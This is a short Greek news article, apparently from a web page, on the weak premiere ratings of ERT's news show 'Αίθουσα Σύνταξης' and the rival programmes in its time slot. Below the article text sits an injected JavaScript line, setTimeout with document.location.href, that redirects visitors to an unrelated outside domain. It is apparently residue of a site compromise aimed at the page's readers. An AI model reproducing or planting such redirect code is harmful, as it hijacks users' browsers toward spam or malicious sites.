Μέτριο ξεκίνημα για την «Αίθουσα Σύνταξης» στην ΕΡΤ…

0
8

 

Μέτριο ήταν το ξεκίνημα της νέας ενημερωτικής εκπομπής της ΕΡΤ, «Αίθουσα Σύνταξης», με παρουσιαστή τον Νίκο Παναγιωτόπουλο και σχολιαστές τον Μανόλη Κοτάκη, την Πηνελόπη Γαβρά, τον Σεραφείμ Κοτρώτσο, τη Νικόλ Λειβαδάρη, την Έρρικα Βαλιάνου και την Αναστασία Γιάμαλη.

Την πρεμιέρα της, χθες Δευτέρα, παρακολούθησαν κατά μέσο όρο 81,000 τηλεθεατές (ποσοστό 2,5%). Καλύτερα ποσοστά έκανε στους συνταξιούχους (3,5%), ενώ στους νεώτερους (15 έως 44 ετών) η απήχηση ήταν μόλις 0,8%.

Είναι φανερό ότι η εκπομπή έχει δρόμο να διανύσει, μέχρις ότου καταφέρει να αποκτήσει ευπρόσωπη παρουσία. Από τις 18.15 που ξεκινά και έως τις 19.00 έχει απέναντι το ειδησεογραφικό μαγκαζίνο του Κωνσταντίνου Μπογδάνου στον Σκάι, που έχει κερδίσει ένα τμήμα του κοινού. Ενώ από τις 7 το απόγευμα έως τις 8 πρέπει να ανταγωνιστεί τα κεντρικά δελτία ειδήσεων του Αlpha με τον Αντώνη Σρόιτερ και του Αντέννα με τη Μαρία Χούκλη.

Έτσι κι αλλιώς, λοιπόν, οι συντελεστές του νέου εγχειρήματος έχουν δύσκολη αποστολή. Ο χρόνος θα δείξει αν και κατά πόσο θα τη φέρουν σε επιτυχή κατάληξη.

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here